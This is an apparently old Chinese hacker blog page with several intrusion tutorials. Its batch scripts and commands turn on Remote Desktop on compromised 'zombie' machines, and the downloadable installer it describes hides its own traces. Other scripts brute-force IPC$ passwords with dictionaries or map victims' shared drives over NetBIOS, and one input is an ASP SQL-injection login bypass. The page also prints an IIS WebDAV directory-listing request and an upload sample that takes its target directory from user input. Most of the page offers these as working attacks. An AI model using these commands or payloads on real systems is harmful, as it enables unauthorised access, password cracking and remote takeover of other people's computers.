~小焦黑客主页~ Hacker天堂
关于作者
|
|
用户名:iceman201 笔名:焦立国[小焦] 地区: 北京-建国门 行业:其他 |
日历 年月日
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
快速登录
搜索
最新文章
- • 【站长留言版〗
- • 开3389的5种方法
- • Win2k命令行下自做弱口令扫描器
- • 利用NetBIOS浏览他人电脑中的资料
- • 目标主机操作系统识别技术
- • ASP程序密码验证漏洞
- • 微软IIS 5.0泄漏索引目录的漏洞
- • 利用ASP.NET设计FTP文件上传{编码案例}
- • ASP错误代码总结
- • Java的白皮书为我们提出了Java语言的11个关键特性
- • 教您如何利用VNC远程图形界面控制Linux
- • 详尽的IPC$入侵
- • 整理的一些有用的ASP注入相关的命令
- • 微软Longhorn无法完全保护机密信息
- • 网络视窗 1.06
- • 个人FTP服务器 1.35
- • QQ病毒专杀工具XP QQKav 2005 SP3
- • 簡單的 Winsock 應用程式設計[包含HOOK函数应用]
- • 送给新手的DOS命令
- • 流光
- • 如何利用终端入侵远程计算机
- • 木马是如何编写的
- • 浅谈用VB6.0编写木马程序
- • ASP常见的安全漏洞 [精]
- • 在win2000 Professional版中安装3389终端服务
最新评论
- ·
流光
放你的屁 流光是你写地 - ·
微软IIS 5.0泄漏索引目录的漏洞
〈学习了〉 - ·
微软IIS 5.0泄漏索引目录的漏洞
〈学习了〉 - ·
微软IIS 5.0泄漏索引目录的漏洞
〈学习了〉 - ·
微软IIS 5.0泄漏索引目录的漏洞
〈学习了〉 - ·
ASP常见的安全漏洞 [精]
这个也能叫做精啊?你不不如把WI...... - ·
ASP常见的安全漏洞 [精]
这个也能叫做精啊?你不不如把WI...... - ·
远程入侵网吧
牛 牛牛 牛牛 牛牛 牛牛 牛 ...... - ·
远程入侵网吧
牛 牛牛 牛牛 牛牛 牛牛 牛 ...... - ·
远程入侵网吧
牛 牛牛 牛牛 牛牛 牛牛 牛 ......
友情连接
合作伙伴
赞助商
特别赞助商
北京网监处颁布
~小焦黑客主页~ Hacker天堂
小焦黑客联盟群号:9057699群二:9057895群三:8034168本人MSN:jiaoliguo52@hotmail.com
文章
【站长留言版〗
(作者置顶)
声名:iceman201和小焦,两笔名都是我,如有转载文章我会在上面标明作者名字的!
如果有转载此站文章请联系QQ:343192237
欢迎各站与本站做友情连接.
LOGO:
地址:http://xiaojiaozaixian.bokee.com/inc/Hacker.gif
热烈庆祝小焦黑客联盟论坛开办:
论坛刚刚建成,欢迎踊跃发贴.....[注:里面有水区,可以灌水]
开3389的5种方法
1,打开记事本,编辑内容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法:
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
服务端口: 设置终端服务的服务端口。默认是3389。
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。(如果/r不行,可以试试这个)
使用此参数时,端口设置不能忽略。
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误,就继续安装好了。
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
3,下载3389自动安装程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
说明:
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版!
5,下载DameWare NT Utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
Win2k命令行下自做弱口令扫描器
批处理文件test.bat
-------------------
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc$ "" /use:"Administrator" | find "命令成功完成" >>test.txt
这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接,如果成功就把结果记录在test.txt。短短173字节,就实现了弱口令扫描的功能!
惊叹web_wolf思维之独到并感慨吾等菜鸟何日能成正果之时,不禁也有所悟:win2k命令行命令也可以用来远程破解NT弱口令!
我们知道,在win2k命令行下有个for命令,其功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。
For命令的格式为:
FOR %variable IN (set) DO command [command-parameters]
当然,for命令最强大的功能,表现在它的一些高级应用中。譬如可以用 /r 参数遍历整个目录树;可以用 /f 参数将文本文件内容作为循环范围;可以用 /f 参数将某一命令执行结果作为循环范围等等。在这里我不一一说明其用法,如果你不熟悉for命令,可以参考相关资料教程。
For命令应用最简单的例子,就是人工指定循环范围,然后对每个值执行指定的命令如果我们把密码做为循环值,把net use命令作为指定命令。那将会产生什么样的效果呢?请看下面的命令:
for /l %i in (100,1,999) do net use \ipipc$ "%i" /user: "username"
解释一下:username是你用nbtstat得到的用户名,这条命令的功能是对指定username进行3位数纯数字密码依次尝试建立ipc连接,直到建立成功或者数字全部试完。如果你网速够快的话,跑完这900个数字也需要多长时间。
也许你想到了,如果对方密码不是纯数字怎么办?有办法!我们还可以用字典,上面不是提到了可以用 /f 参数将文本文件内容作为循环范围吗?
for /f %i in (pass.txt) do net use \ipipc$ "%i" /user:"username"
pass.txt是字典文件,其格式为一个密码占一行。例如:
123
1234
12345
abc
abcd
这条命令的功能是对指定帐号username用密码字典pass.txt中的密码依次尝试建立ipc连接,直到建立成功或者密码全部试完。
可问题还是有,虽然这样我们碰巧是能连接成功,可我们仍然不知道密码啊,下次要用还得重新全部试过。 我们应该想办法把尝试成功的用户名和密码保存在指定文件才行啊!
以下是我实验后的结果,也许不是什么好方法,但是完全可以实现对指定ip扫描并且把结果保存在指定文件。
由于我们现在要实现的功能不是一句命令所能完成的,所以我们把所有命令写成批处理文件。
先提醒一下,在批处理文件中使用 FOR 命令时,指定变量使用 %%variable,而不是%variable。
将下面内容存为scan.bat:
@echo off
echo Written By ypy >>%4
echo Email:ypy_811@eyou.com >>%4
echo --------------------------------- >>%4
date /t >>%4
time /t >>%4
echo ---- >>%4
echo Result:>>%4
start "scan…" /min cmd /c for /f %%i in (%2) do call ipc.bat %1 "%%i" %3 %4
exit
将下面内容存为ipc.bat:
net use \%1ipc$ %2 /user:"%3"
goto result%ERRORLEVEL%
:result0
echo Remote Server:%1 >>%4
echo Username:%3 >>%4
echo Password:%2 >>%4
echo ---- >>%4
net use \%1ipc$ /del
exit
:result2
ipc.bat中的%ERRORLEVEL%表示取前一命令执行后的返回结果。net use命令成功完成返回0,失败返回2。
将scan.bat和ipc.bat存放于system32目录中,用法如下:
scan.bat 主机 密码字典文件 用户名 结果存放文件
例如:
scan.bat 192.168.35.17 d:pass.txt administrator d:
esult.txt
密码破解出来之后,存放于d:
esult.txt里面。
我稍微解释一下扫描的原理,就是对帐号administrator用密码字典pass.txt中的密码依次尝试建立ipc连接,如果成功,则记录密码,不成功则试下一个密码。
可是细心的你肯定又发现问题了,这样只能指定用户名啊?如果我用nbtstat探测到了十几个用户,就需要打十几遍命令?
既然我们可以从指定文件中循环取密码,那我们也可以从另一指定文件中循环取用户名啊,让我们再来修改一下:
将下面内容存为scan.bat:
@echo off
echo --------------------------------- >>%4
echo Written By ypy >>%4
echo Email:ypy_811@eyou.com >>%4
echo --------------------------------- >>%4
date /t >>%4
time /t >>%4
echo Result:>>%4
echo ---- >>%4
start "scan..." /min cmd /c for /f %%i in (%3) do call pass.bat %1 %2 "%%i" %4
exit
将下面内容存为pass.bat:
start "scan..." /min cmd /c for /f %%i in (%2) do call ipc.bat %1 "%%i" %3 %4
将下面内容存为ipc.bat:
net use \%1ipc$ %2 /user:"%3"
goto result%ERRORLEVEL%
:result0
echo Remote Server:%1 >>%4
echo Username:%3 >>%4
echo Password:%2 >>%4
echo ---- >>%4
net use \%1ipc$ /del
exit
:result2
将scan.bat、pass.bat和 ipc.bat存放于system32目录中,用法如下:
scan.bat 主机 密码字典文件 用户字典文件 结果存放文件
例如:
scan.bat 192.168.35.17 d:pass.txt d:user.txt d:
esult.txt
其中用户字典文件user.txt的内容是你用nbtstat探测到的所有用户名,其格式和密码字典文件一样,一个字符串占一行。例如:
administrator
admin
ypy
这样扫描的原理是对用户字典user.txt中的每一个用户,同时用密码字典pass.txt中的密码依次尝试建立ipc连接,如果成功则记录用户名和密码,如果不成功就试下一个密码。
现在是不是有点对user.txt中的用户暴力跑ipc获得密码的味道啊?呵呵。我用这个简单弱口令扫描器挂了一个xkey做的字典扫一台有八个用户的win2k server,还真扫出了两个密码!而且速度很快!
好了,在Win2k命令行下简单做弱口令扫描器的方法就先介绍到这里,可能还有许多种更简单的方法能实现相同的功能,你可以去尝试一下。
事实上,当微软从win2k开始将命令行增强后,借鉴了相当多unix的优点,虽然还不至于像unix那么灵活,但可以实现的功能已相当之多。
写本文是希望起到介绍和抛砖引玉的效果。所以没有实验更多功能,故给出几点说明:
1.不能对指定网段扫描。
2.此扫描原理是用帐号和密码循环建立ipc$连接,因此如果对方没开139端口或者删除了ipc$共享,那就不能工作了,呵呵。
3.扫描方式是用户字典中的用户名同时在挂密码字典跑ipc,由于不允许一个用户使用一个以上用户名与一台 服务器或共享资源多重连接,导致有的的帐号密码本应该真确的可返回的结果为失败,所以有时候会漏报。
但是如果你的字典中帐好和密码至少有一对正确的话,那至少能记录一对正确结果。
4.文中所有例子在win2k server和win xp上通过测试。
利用NetBIOS浏览他人电脑中的资料
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
要远程使用NetBIOS,目标计算机必须运行该服务并未对之实施保护。可以打开端口扫描器进行扫描:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
如果结果如上,恭喜...
2. nbtstat
我们可以使用nbtstat获得攻击所需信息。打开WinXP的控制台或早期Windows版本的命令行。
输入命令:
-----------------------------------------------------------
c:\>nbtstat -A 127.0.0.1
-----------------------------------------------------------
如果使用IP地址就使用-A,使用主机名则使用-a.
运行后将获得如下信息:
code:-------------------------------------------------------
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
----------------------------------------------------
下面这一行
-----------------------------------------------------
computername <20> UNIQUE Registered
--------------------------------------
很有用,因为<20>表示文件共享已经启用了。 那就意味着我们可以尝试连接到该电脑。
首先,我们需要知道硬盘名称等信息,并且我们还需要知道它是否安装的是XP以及有没有开放文件共享。可以使用命令:
net view \\ipaddress来完成。
输入:
----------------------------------------------------------
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
--------------------------------------------------------
应该获得如上显示信息 (在非XP系统中会有所不同).
该做点有趣的事情了: 如果想要像使用本地计算机一样使用和浏览该电脑,我们可以使用net use。格式如下:
net use letter: \\ipaddress\name
输入:
-----------------------------------------------------------
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
-------------------------------------------------------
现在目标计算机的硬盘已映射为我们刚刚指定的盘符。(确保这一盘符不与本地电脑已使用盘符冲突)完成后就可以如同浏览本地电脑一样进行浏览 :
输入:
------------------------------------------------
c:\>cd g:
g:\>
---------------------------------------------
在windows XP中,可以直接打开“我的电脑”,在图形界面下浏览刚刚添加的映射盘.
完成后,记得要从机器中删除映射盘。
输入:
--------------------------------------------------------
c:\>net use /delete g:
g: was deleted successfully.
----------------------------------------------------
有些系统需要密码才可以进入 (win2k, WinNT): (可以通过扫描器扫描)
获得密码后可使用如下命令进入:
--------------------------------------------------------------
net use password \\ip\sharename
---------------------------------------------------------------
目标主机操作系统识别技术
1、让我们能够大致判断目标是什么操作系统
2、目标到底在运行些什么服务
当然,要扫描得到这些东西还是最后为了让我们能够知道哪些可能拿来利用,可能存在的漏洞,对目标主机的操作系统类型识别,更能够方便地让我们去利用操作系统对应的漏洞实施攻击。很多工具提供的扫描也可能就直接得到什么操作系统了,或者相对应的端口使用的是什么程序,程序是什么版本的等等。不过,这些都是由那些工具自己做了,不讨论这个,我们应该去想想这些工具到底是怎么去实现的。
对目标主机操作系统识别的目的,正如Fyodor(nmap的作者)在他的
《Remote OS detection via TCP/IP Stack FingerPrinting》中讲解那样,进行主机识别有两个主要作用,第一,很多系统漏洞是同OS密切相关的,还有就是社会学(social engineering)问题,你能够在非常了解对方的系统之后,冒充软件提供商给目标发送“补丁”。按照我们上面提到的高级扫描方式,直接进行的端口扫描,能够赋予我们绕过防火墙的能力,而且可以尽可能地隐藏
自己等等,但是,我们能够得到的信息也是有限的,也许对是否开放一个端口并不是那么直接地感兴趣,比如一个21端口,我们真正感兴趣的是这个端口被用来作什么了,运行地什么版本的程序,而不是仅仅打开一个21端口就满意了。也就是说,我们对下面得到地这个东西更感兴趣(关系到IP的地方,我都用X代替了):
C:\>ftp XXX.XXX.XXX.XXX
Connected to XXX.XXX.XXX.XXX.
220 XXXXX X2 WS_FTP Server 1.0.5 (1327846197)
User (XXX.XXX.XXX.XXX:(none)):
其实,这就是一种最简单和最直接的判别方式,获得程序版本变相地也让我们能够估计到目标的操作系统类别。我们可以对每个打开的端口进行相应的连接,通常这些服务程序就会非常高兴地显示自己的“banner”,也就让我们能够直接得到他是什么版本了。甚至,我们能够得到更好的东西:
C:\>telnet XXX.XXX.XXX.XXX
Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686
login:
这让我们对操作系统版本一览无余了。正象这些只对80端口感兴趣的“黑客”一样,通过对80端口的连接,我们也能得到足够多的信息。
C:\>telnet XXX.XXX.XXX.XXX 80
HEAD / HTTP/1.1
HTTP/1.1 200 OK
Via: 1.1 ADSL2000
Content-Length: 97
Date: Thu, 24 Jan 2002 13:46:56 GMT
Content-Type: text/html
Server: Apache/1.3.20 (Unix) PHP/4.0.6
Last-Modified: Wed, 26 Dec 2001 09:22:54 GMT
ETag: "8715f-61-3c2996ee"
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=100
可以注意到:Server: Apache/1.3.20 (Unix) PHP/4.0.6,这里很明白地“贡献”出WEB服务器的软件版本。
这样直接的连接探测方式,对于这些banner开放的,简直是太容易了,当然,负责的管理员也会屏蔽或者修改掉这些BANNER。
还有一种粗劣而且简单的判别主机操作系统类型的办法就是通过Ping,然后分析得到的TTL值,当然,稍微准确点可以同时在配合Tracert来确定主机原始的TTL值,不过,这种办法很容易被欺骗,比如,在WINDOWS系统中,对注册表的修改:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Key: DefaultTTL
通过对DefaultTTL的修改,比如:修改成为255,伪装成为一台UNIX主机,就能够造成探测者的错误判断。
对主机使用端口的分析,同样也能够进行操作系统识别,一些操作系统使用特殊的端口,比如:WINDOWS的137、139,WIN2K的445,而且一些网络设备比如入侵检测系统、防火墙等等也都有厂商自己的端口开放。
上面的这些识别方式也是那些负责管理员能够简单应付的方式,这里,我们可以看看高级的主机识别技术,这些技术主要分为两类:主动协议识别和被动协议识别,都是利用各种操作系统在网络协议通讯中使用不同的协议内容(各个厂商有自己的规定),然后对这些不同之处进行分析进行的识别。
Nmap这个强大的扫描工具在远程主机判断上也使用了很多技术,来实现更高级的主机系统检测。这主要是通过主动的TCP/IP协议辨识来实现的,每种操作系统在TCP交流中总是使用一些具有特性的标志,这些标志在TCP IP数据包的头中表现出来。比如window、ACK序号、TTL等等的不同反应,通过大量的数据分析,然后精确地判断主机系统。这些系统的协议特性包括(这只是一小部分):
FIN识别:发送一个只有FIN标志位的TCP数据包给一个打开的端口并等待回应。正确的RFC793行为是不响应,但有些系统,例如 MS Windows, BSDI, CISCO, HP/UX,MVS,和IRIX 发回一个RESET。
DF位识别:许多操作系统在送出的一些包中设置IP的DF(不分片)位。
WINDOW大小:检查返回包的窗口大小。特定操作系统反应的窗口大小基本是常数,例如,AIX 是唯一用0x3F25的),Microsoft 以及OpenBSD 与FreeBSD用的是0x402E。
ACK 序号识别:不同实现中ACK的值是不同的。例如,如果你送了一个FIN|PSH|URG 到一个关闭的TCP 端口。大多数实现会设置ACK 为你的初始序列数,而Windows 和一些傻打印机会送给你序列数加1。
在之后,Fyodor 和Ofir又分析和收集利用ICMP协议的操作系统特性来进行的主机系统判别,这种主动的识别方式都经过了大量的分析,原理和上面的TCP/IP协议识别相同,比如:用ICMP的地址掩码请求来探测SUN操作系统,对于ICMP地址掩码请求,只有少数操作系统会产生相应的应答,这些系统包括ULTRIX OpenVMS, Windows 95/98/98 SE/ME,
NT below SP 4, 和 SUN Solaris机器。但SUN对分片ICMP地址掩码请求的应答同其他操作系统不相同,这样就可以来识别SUN主机操作系统。
和主动的协议识别原理相同,Lance Spitzner在《Passive Fingerprinting》中提出了被动的协议识别,同样用来判别主机系统。这种办法主要集中考虑:
1、TTL的设置
2、WINDOW SIZE:操作系统设置的窗口大小
3、DF:操作系统是否设置分片位
4、TOS:操作系统设置的服务类型
对于TTL,对于一个操作系统来说一般是固定的,比如LINUX Kernel 2.2.x & 2.4.x的 TTL 字段值为 64,
FreeBSD 4.1, 4.0, 3.4; Sun Solaris 2.5.1, 2.6, 2.7, 2.8;的 TTL为 255 Windows NT,Windows 2000 的为 128等,同时将配合其他需验证的内容,比如:LINUX的窗口值是0x7D78,Solaris2.6-2.7的窗口值有几种0x2328,0x2238等等。我们以WIN2000为例,它的TTL为“128”,窗口大小在“17000-18000”这个范围内,并且设置分片位,即DF为1,
而操作系统设置的服务类型TOS为“0”,如果我们对接收的原始数据分析得到这样的结果,那么我们可以判断这是一个WIN2000的操作系统。
当然被动协议识别操作系统也需要分析各个操作系统的不同反馈属性,然后根据得到的信息同收集的属性相比较。比如多数系统使用DF位设置,但是有些系统如SCO和OPENBSD不使用这个DF标志,这样就可以用来识别一些没有设置DF位的操作系统。被动协议识别也可以用来判断远程代理防火墙,因为代理防火墙重建对客户的连接,它有它自身的特征代码,也可以用这样的办法来分析。
主动协议识别和被动协议识别需要进行大量的统计分析,虽然比最开始介绍的那些简单识别方法准确些,但是也并不能保证一定能够识别得到准确的操作系统类型。同时这两种方法主要区别就在于一个是主动,而一个是被动的,主动识别方式需要主动发送数据包,因此相对于那些安全设备来说,也比较容易识别这些数据包,同被动识别比较起来,隐蔽性稍微差些。
Reference:
1、《X - Remote ICMP Based OS Fingerprinting Techniques》
2、Phrack #57《ICMP based remote OS TCP/IP stack fingerprinting techniques》
3、Fyodor《Remote OS detection via TCP/IP Stack FingerPrinting》
4、Lance Spitzner《Passive Fingerprinting》
ASP程序密码验证漏洞
的洞的。)。
一般来说,我们在验证用户是否合法时,会用如下的语句:
set db=server.CreateObject("ADOdb.recordset")
sqlstr=select * from table where user='"&request("user")&"' and password='"&request("password")&"'"
db.open sqlstr,"DSN=aa;",1然后检测得到的表是否为空,如果为空则用户非法,如果不为空则用户是合法的。
if db.eof and db.bof then
ok="no"
else
ok="yes"
end if这段程序单从技术角度看规范的,但从安全角度看就存在一个非常大的洞。因为我们可以构造一个特殊的用户
口令和用户名从而进入受保护的系统内部。
user='aa' or user<>'aa'
password='aa' or password<>'aa'
相应的在浏览器端的用户名框内写入:aa' or user<>'aa
口令框内写入:aa' or password<>'aa,注意这两个字符串两头是没有'的。
这样就可以成功的骗过系统而进入。
理论虽然如此,但要实践是非常困难的,下面两个条件都必须具备。
1.你首先要能够准确的知道系统在表中是用哪两个字段存储用户名和口令的,只有这样你才能准确的构造出这个进攻
性的字符串。实际上这是很难猜中的。
2.系统对你输入的字符串不进行有效性检查。
从这儿可以看出源码泄露的漏洞有时是致命的!!
我想出的解决办法:
1.就象yexiaolu所说的,分开写,可以看看他的贴子。
2.将存储用户名和用户口令的字段取两个毫不相干的名字,让攻击者猜不中。
3.对用户输入的数据进入有效性检查,如替换掉'等。
4.可以考虑对口令进行简单的加密,如将输入的口令字符串变换一下字符串中字符的位置等都可以有效的防止这种进
攻。
5.最重要的一点,不要泄露你的源码!!!!
微软IIS 5.0泄漏索引目录的漏洞
+ Microsoft Windows NT 2000
描述:
--------------------------------------------------------------------------------
如果IIS 5.0中的Index Server被允许的话,远程用户就可能察看整个根目录结构以及所有子目录,这是因为WebDAV的查找实现中存在一个缺陷。隐藏目录、包含文件(*.inc)或其它在正常的网站界面中一般不能存取的文档就会由于这个漏洞而泄漏。
成功地利用这个漏洞就可能找到那些可能包含敏感信息如用户名和密码的特定文件。
默认情况下IIS 5.0中的Index Server是被禁止的,只有设置了“Index”属性的目录才会受到这个漏洞的影响。
<* 来源:David Litchfield <dlitchfield@atstake.com> *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
发送如下的请求给服务器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
--------------------------------------------------------------------------------
建议:
临时解决办法:
NSFOCUS建议您使用微软提供的解决方案:
如果您没有使用Index Server(比如您的网站中没有需要查找的内容),禁止或卸载该服务。或者将包含敏感信息的目录的“Index this resource”的选项禁止。
厂商补丁:
微软已发布一篇知识库文章详细描述了这个问题的解决方法,可以在如下的位置找到这篇文章:
http://www.microsoft.com/technet/support/kb.asp?ID=272079
利用ASP.NET设计FTP文件上传{编码案例}
<html >
<BODY >
<SCRIPT LANGUAGE = "VB" RUNAT = "SERVER" >
Sub UploadFile_Clicked ( Sender as Object, e as EventArgs )
Dim lstrFileName as string
Dim lstrFileNamePath as string
Dim lstrFileFolder as string
' 如果上传目录为空,就使用" c:\ "作为缺省上传目录
' 获得上传到服务器的目录名称
if dir.value <> "" then
lstrFileFolder = dir.value
else
lstrFileFolder = "c:\"
end if
' 获得文件名称
lstrFileName = loFile.PostedFile.FileName
' 注: loFile.PostedFile.FileName 返回的是
通过文件对话框选择的文件名,这之中包含了文件的目录信息
lstrFileName = Path.GetFileName ( lstrFileName )
' 去掉目录信息,返回文件名称
' 判断上传目录是否存在,不存在就建立
If ( not Directory.Exists ( lstrFileFolder ) ) Then
Directory.CreateDirectory ( lstrFileFolder )
End If
'上传文件到服务器
lstrFileNamePath = lstrFileFolder & lstrFileName
' 得到上传目录及文件名称
loFile.PostedFile.SaveAs ( lstrFileNamePath )
' 获得并显示上传文件的属性
FileName.Text = lstrFileName
' 获得文件名称
FileType.Text = loFile.PostedFile.ContentType
' 获得文件类型
FileLength.Text = cStr ( loFile.PostedFile.ContentLength )
' 获得文件长度
FileUploadForm.visible = false
AnswerMsg.visible = true
' 显示上传文件属性
End sub
</SCRIPT >
<ASP:panel id = "FileUploadForm" visible = " true " runat = "server" >
<form method = "post" enctype = "multipart/form-data" runat = "server" >
<h1 > 欢迎使用ASP.NET页面实现文件上传 </h1 >
请选择上传到服务器的文件名称:
<input id = "loFile" type = "file" runat = "server" > <br >
请输入上传到服务器的目录名称:
<input id = "dir" type = "text" runat = "server" > <br >
<input type = "submit" value = "开始上传" OnServerClick = "
UploadFile_Clicked" runat = "server" >
<br >
</form >
</ASP:panel >
<ASP:panel id = "AnswerMsg" visible = " false " runat = "server" >
谢谢使用ASP.NET页面实现文件上传 <br >
成功上传 <ASP:label id = "FileName" runat = "server" /> <br >
文件大小 <ASP:label id = "FileLength" runat = "server" /> 字节 <br > 文件类型 <ASP:label id = "FileType " runat = "server" /> <br >
</ASP:panel >
</BODY >
ASP错误代码总结
Microsoft VBScript语法错误(0x800A03EA)-->语法错误
Microsoft VBScript语法错误(0x800A03EB)-->缺少 ':'
Microsoft VBScript语法错误(0x800A03ED)-->缺少 '('
Microsoft VBScript语法错误(0x800A03EE)-->缺少 ')'
Microsoft VBScript语法错误(0x800A03EF)-->缺少 ']'
Microsoft VBScript语法错误(0x800A03F2)-->缺少标识符
Microsoft VBScript语法错误(0x800A03F3)-->缺少 '='
Microsoft VBScript语法错误(0x800A03F4)-->缺少 'If'
Microsoft VBScript语法错误(0x800A03F5)-->缺少 'To'
Microsoft VBScript语法错误(0x800A03F6)-->缺少 'End'
Microsoft VBScript语法错误(0x800A03F7)-->缺少 'Function'
Microsoft VBScript语法错误(0x800A03F8)-->缺少 'Sub'
Microsoft VBScript语法错误(0x800A03F9)-->缺少 'Then'
Microsoft VBScript语法错误(0x800A03FA)-->缺少 'Wend'
Microsoft VBScript语法错误(0x800A03FB)-->缺少 'Loop'
Microsoft VBScript语法错误(0x800A03FC)-->缺少 'Next'
Microsoft VBScript语法错误(0x800A03FD)-->缺少 'Case'
Microsoft VBScript语法错误(0x800A03FE)-->缺少 'Select'
Microsoft VBScript语法错误(0x800A03FF)-->缺少表达式
Microsoft VBScript语法错误(0x800A0400)-->缺少语句
Microsoft VBScript语法错误(0x800A0401)-->语句未结束
Microsoft VBScript语法错误(0x800A0402)-->缺少整型常数
Microsoft VBScript语法错误(0x800A0403)-->缺少 'While' 或 'Until'
Microsoft VBScript语法错误(0x800A0404)-->缺少 'While', 'Until' 或语句未结束
Microsoft VBScript语法错误(0x800A0405)-->缺少 'With'
Microsoft VBScript语法错误(0x800A0406)-->标识符过长
Microsoft VBScript语法错误(0x800A0407)-->无效数字
Microsoft VBScript语法错误(0x800A0408)-->无效字符
Microsoft VBScript语法错误(0x800A0409)-->未结束的字符串常量
Microsoft VBScript语法错误(0x800A040A)-->注释未结束
Microsoft VBScript语法错误(0x800A040D)-->无效使用 'Me' 关键字
Microsoft VBScript语法错误(0x800A040E)-->'loop' 语句缺少 'do'
Microsoft VBScript语法错误(0x800A040F)-->无效的 'exit' 语句
Microsoft VBScript语法错误(0x800A0410)-->循环控制变量 'for' 无效
Microsoft VBScript语法错误(0x800A0411)-->名称重定义
Microsoft VBScript语法错误(0x800A0412)-->必须是行中的第一个语句
Microsoft VBScript语法错误(0x800A0413)-->不能为 non-ByVal 参数赋值
Microsoft VBScript语法错误(0x800A0414)-->调用子程序时不能使用括号
Microsoft VBScript语法错误(0x800A0415)-->缺少文字常数
Microsoft VBScript语法错误(0x800A0416)-->缺少 'In'
Microsoft VBScript语法错误(0x800A0417)-->缺少 'Class'
Microsoft VBScript语法错误(0x800A0418)-->必须在一个类的内部定义
Microsoft VBScript语法错误(0x800A0419)-->在属性声明中缺少 Let , Set 或 Get
Microsoft VBScript语法错误(0x800A041A)-->缺少 'Property'
Microsoft VBScript语法错误(0x800A041B)-->在所有属性的规范中,变量的数目必须一致
Microsoft VBScript语法错误(0x800A041C)-->在一个类中不允许有多个缺省的属性/方法
Microsoft VBScript语法错误(0x800A041D)-->类的初始化或终止程序没有参数
Microsoft VBScript语法错误(0x800A041E)-->属性的 set 或 let 必须至少有一个参数
Microsoft VBScript语法错误(0x800A041F)-->错误的 'Next'
Microsoft VBScript语法错误(0x800A0420)-->'Default' 只能在 'Property' , 'Function' 或 'Sub' 中指定
Microsoft VBScript语法错误(0x800A0421)-->指定 'Default' 时必须同时指定 'Public' ")
Microsoft VBScript语法错误(0x800A0422)-->只能在 Property Get 中指定 'Default'
Microsoft VBScript 运行时错误(0x800A0005)-->无效的过程调用或参数
Microsoft VBScript 运行时错误(0x800A0006)-->溢出
Microsoft VBScript 运行时错误(0x800A0007)-->内存不足
Microsoft VBScript 运行时错误(0x800A0009)-->下标越界
